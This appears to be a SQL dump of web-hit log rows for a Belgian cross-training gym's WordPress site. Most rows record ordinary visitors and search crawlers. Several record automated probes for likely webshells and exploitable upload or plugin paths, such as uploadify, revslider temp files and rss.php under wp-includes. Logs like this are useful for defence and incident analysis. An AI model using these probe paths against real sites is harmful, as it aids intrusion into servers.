(75196, 1497387724.795077, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(75197, 1497387725.256963, 1837280593, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/603.2.5 (KHTML, like Gecko) Version/10.1.1 Safari/603.2.5'),
(75198, 1497387725.299113, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(75199, 1497387725.710596, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(75200, 1497387726.126429, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(75201, 1497387726.416230, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/603.2.5 (KHTML, like Gecko) Version/10.1.1 Safari/603.2.5'),
(75202, 1497387726.427719, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(75203, 1497387726.735092, 1837280593, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_0 like Mac OS X) AppleWebKit/602.1.38 (KHTML, like Gecko) Version/10.0 Mobile/14A300 Safari/602.1'),
(75204, 1497387726.933366, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(75205, 1497387727.160163, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(75206, 1497387727.564183, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(75207, 1497387727.961421, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(75208, 1497387728.465261, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(75209, 1497387728.911577, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(75210, 1497387729.346555, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(75211, 1497390171.403945, 2835380908, 0, 1, 0, 0, 1, 'http://crosstrainingcenter.be/wp-includes/images/media/rss.php', 'http://crosstrainingcenter.be/wp-includes/images/media/rss.php', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)'),
(75212, 1497393056.701201, 3024883480, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/contact/', '', 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)'),
(75213, 1497405823.554124, 2637637379, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(75214, 1497408786.856475, 2954838202, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/hello-world/', '', 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko'),
(75215, 1497417256.914232, 676177710, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(75216, 1497418462.237044, 1374769563, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_2 like Mac OS X) AppleWebKit/603.2.4 (KHTML, like Gecko) Version/10.0 Mobile/14F89 Safari/602.1'),
(75217, 1497418463.034381, 1374769563, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75218, 1497418463.649586, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75219, 1497418464.274243, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75220, 1497418464.823455, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75221, 1497418465.480130, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75222, 1497418466.286007, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75223, 1497418466.829392, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75224, 1497418467.354104, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75225, 1497418467.906650, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75226, 1497418468.456017, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75227, 1497420840.522838, 84515914, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; MJ12bot/v1.4.7; http://mj12bot.com/)'),
(75228, 1497420842.487897, 84515914, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/author/admin/feed/', '', 'Mozilla/5.0 (compatible; MJ12bot/v1.4.7; http://mj12bot.com/)'),
(75229, 1497420844.432948, 84515914, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/en-images/feed/', '', 'Mozilla/5.0 (compatible; MJ12bot/v1.4.7; http://mj12bot.com/)'),
(75230, 1497420847.008047, 84515914, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/le-cross-training/feed/', '', 'Mozilla/5.0 (compatible; MJ12bot/v1.4.7; http://mj12bot.com/)'),
(75231, 1497420849.638657, 84515914, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/feed/', '', 'Mozilla/5.0 (compatible; MJ12bot/v1.4.7; http://mj12bot.com/)'),
(75232, 1497423438.412207, 2745986199, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-admin/logo_img.php', 'http://www.crosstrainingcenter.be/wp-admin/logo_img.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36'),
(75233, 1497448996.262367, 1374769563, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_2 like Mac OS X) AppleWebKit/603.2.4 (KHTML, like Gecko) Version/10.0 Mobile/14F89 Safari/602.1'),
(75234, 1497448996.858132, 1374769563, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75235, 1497448997.290283, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75236, 1497448997.778193, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75237, 1497448998.220492, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75238, 1497448998.663867, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75239, 1497448999.202606, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75240, 1497448999.672731, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75241, 1497449000.121985, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75242, 1497449000.546324, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75243, 1497449001.060436, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75244, 1497449513.258316, 3346287885, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/popup-pomo.phpdel', 'http://crosstrainingcenter.be/popup-pomo.phpdel', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(75245, 1497453387.104126, 2637637379, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(75246, 1497453387.115563, 2637637379, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(75247, 1497459095.287703, 676177847, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(75248, 1497459153.784540, 2996488242, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)'),
(75249, 1497459158.021056, 1570674744, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)'),
(75250, 1497459326.875815, 1538362361, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'https://l.facebook.com/', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Dragon/52.15.25.664 Chrome/52.0.2743.82 Safari/537.36'),
(75251, 1497459327.252123, 2919004276, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)'),
(75252, 1497459328.879774, 1538362361, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Dragon/52.15.25.664 Chrome/52.0.2743.82 Safari/537.36'),
(75253, 1497459333.020023, 1538362361, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/le-cross-training/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Dragon/52.15.25.664 Chrome/52.0.2743.82 Safari/537.36'),
(75254, 1497459343.823818, 1538362361, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/contact/', 'http://www.crosstrainingcenter.be/le-cross-training/', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Dragon/52.15.25.664 Chrome/52.0.2743.82 Safari/537.36'),
(75255, 1497459429.247821, 1538362361, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.crosstrainingcenter.be/contact/', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Dragon/52.15.25.664 Chrome/52.0.2743.82 Safari/537.36'),
(75256, 1497459446.109453, 1538362361, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/', 'http://www.crosstrainingcenter.be/les-seances-namur/', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Dragon/52.15.25.664 Chrome/52.0.2743.82 Safari/537.36'),
(75257, 1497464998.801009, 1538472373, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/', 'https://www.google.be/', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_2 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) GSA/28.0.157793287 Mobile/14F89 Safari/602.1'),
(75258, 1497465006.519173, 1538472373, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.crosstrainingcenter.be/lequipe/', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_2 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) GSA/28.0.157793287 Mobile/14F89 Safari/602.1'),
(75259, 1497467610.005610, 1399309361, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C)'),
(75260, 1497468346.177904, 90545271, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/wp-db-ajax-made/news_parser.class.php', 'http://crosstrainingcenter.be/wp-content/plugins/wp-db-ajax-made/news_parser.class.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(75261, 1497473372.066454, 3428697494, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/wp-db-ajax-made-1/wp-db-backup.php', 'http://crosstrainingcenter.be/wp-content/plugins/wp-db-ajax-made-1/wp-db-backup.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(75262, 1497473450.399256, 3428697494, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/wp-db-ajax-made-1/wp-db-backup.php', 'http://crosstrainingcenter.be/wp-content/plugins/wp-db-ajax-made-1/wp-db-backup.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(75263, 1497475046.138674, 676177847, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(75264, 1497481195.191933, 2637637527, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(75265, 1497481314.230113, 2637637527, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/contact/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(75266, 1497488374.496067, 676177847, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/en-images/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(75267, 1497497525.862423, 3475901888, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(75268, 1497500262.934120, 3024883599, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/266-2/', '', 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)'),
(75269, 1497503902.131119, 2001500246, 0, 1, 0, 0, 1, 'http://crosstrainingcenter.be/wp-content/indes.php', 'http://crosstrainingcenter.be/wp-content/indes.php', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)'),
(75270, 1497509329.748768, 1600967956, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)'),
(75271, 1497509444.365030, 1123635081, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(75272, 1497509444.853288, 1123635081, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(75273, 1497510063.230297, 1123635081, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(75274, 1497510771.596775, 1123635081, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/feed/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(75275, 1497512348.909112, 3233508538, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'http://www.crosstrainingcenter.be/wp-admin/', 'Mozilla/5.0 (Windows; Windows NT 5.1; en-US) Firefox/3.5.0'),
(75276, 1497512349.652672, 3233508538, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/uploads/51217766.php', '', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)'),
(75277, 1497512350.501430, 3233508538, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/uploadify/uploadify.php?folder=/', 'http://www.crosstrainingcenter.be/wp-admin/', 'Mozilla/5.0 (Windows; Windows NT 5.1; en-US) Firefox/3.5.0'),
(75278, 1497512352.191849, 3233508538, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/revslider/temp/update_extract/57758779.php', '', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)'),
(75279, 1497512353.385008, 3233508538, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/license.php', 'http://www.crosstrainingcenter.be/wp-admin/', 'Mozilla/5.0 (Windows; Windows NT 5.1; en-US) Firefox/3.5.0'),
(75280, 1497517316.572913, 1382193106, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/temp1-1.php', 'http://crosstrainingcenter.be/temp1-1.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(75281, 1497523380.327979, 1332607321, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'https://www.google.es/', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36'),
(75282, 1497523382.657762, 1332607321, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36'),
(75283, 1497524362.084049, 1837182367, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'https://www.google.be/', 'Mozilla/5.0 (iPad; CPU OS 10_3_2 like Mac OS X) AppleWebKit/603.2.4 (KHTML, like Gecko) Version/10.0 Mobile/14F89 Safari/602.1'),
(75284, 1497524446.153149, 2366145606, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)'),
(75285, 1497526723.788274, 3492536660, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; SiteExplorer/1.1b; +http://siteexplorer.info/Backlink-Checker-Spider/)'),
(75286, 1497526728.206790, 3492536660, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; SiteExplorer/1.1b; +http://siteexplorer.info/Backlink-Checker-Spider/)'),
(75287, 1497532505.081107, 1123635081, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(75288, 1497534635.449504, 1123635081, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/author/admin/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(75289, 1497534962.281244, 1123635081, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/author/admin/feed/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(75290, 1497535400.016834, 676177847, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(75291, 1497535511.361489, 1540872198, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/onten/onten.php', 'http://crosstrainingcenter.be/wp-content/plugins/onten/onten.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(75292, 1497535792.225428, 2071806886, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.93 Safari/537.36'),
(75293, 1497539136.261939, 2071806883, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.93 Safari/537.36'),
(75294, 1497540611.251465, 1834585734, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/le-cross-training/', 'android-app://com.google.android.googlequicksearchbox', 'Mozilla/5.0 (Linux; Android 7.0; SM-A510F Build/NRD90M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.83 Mobile Safari/537.36'),
(75295, 1497540613.297608, 1834585734, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/le-cross-training/', 'Mozilla/5.0 (Linux; Android 7.0; SM-A510F Build/NRD90M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.83 Mobile Safari/537.36'),
(75296, 1497540652.007331, 1834585734, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/contact/', 'http://www.crosstrainingcenter.be/le-cross-training/', 'Mozilla/5.0 (Linux; Android 7.0; SM-A510F Build/NRD90M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.83 Mobile Safari/537.36'),
(75297, 1497540686.334585, 1834585734, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.crosstrainingcenter.be/le-cross-training/', 'Mozilla/5.0 (Linux; Android 7.0; SM-A510F Build/NRD90M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.83 Mobile Safari/537.36'),
(75298, 1497540753.866556, 1834585734, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.crosstrainingcenter.be/le-cross-training/', 'Mozilla/5.0 (Linux; Android 7.0; SM-A510F Build/NRD90M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.83 Mobile Safari/537.36'),
(75299, 1497540945.319399, 2637637427, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(75300, 1497540945.656395, 2637637427, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(75301, 1497543445.996234, 1123633613, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(75302, 1497544378.644314, 84491800, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/cron.php', 'http://crosstrainingcenter.be/cron.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(75303, 1497544605.939073, 1374769563, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_2 like Mac OS X) AppleWebKit/603.2.4 (KHTML, like Gecko) Version/10.0 Mobile/14F89 Safari/602.1'),
(75304, 1497544606.565279, 1374769563, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75305, 1497544607.002312, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75306, 1497544607.493709, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75307, 1497544607.943567, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75308, 1497544608.380003, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75309, 1497544608.908740, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75310, 1497544609.359165, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
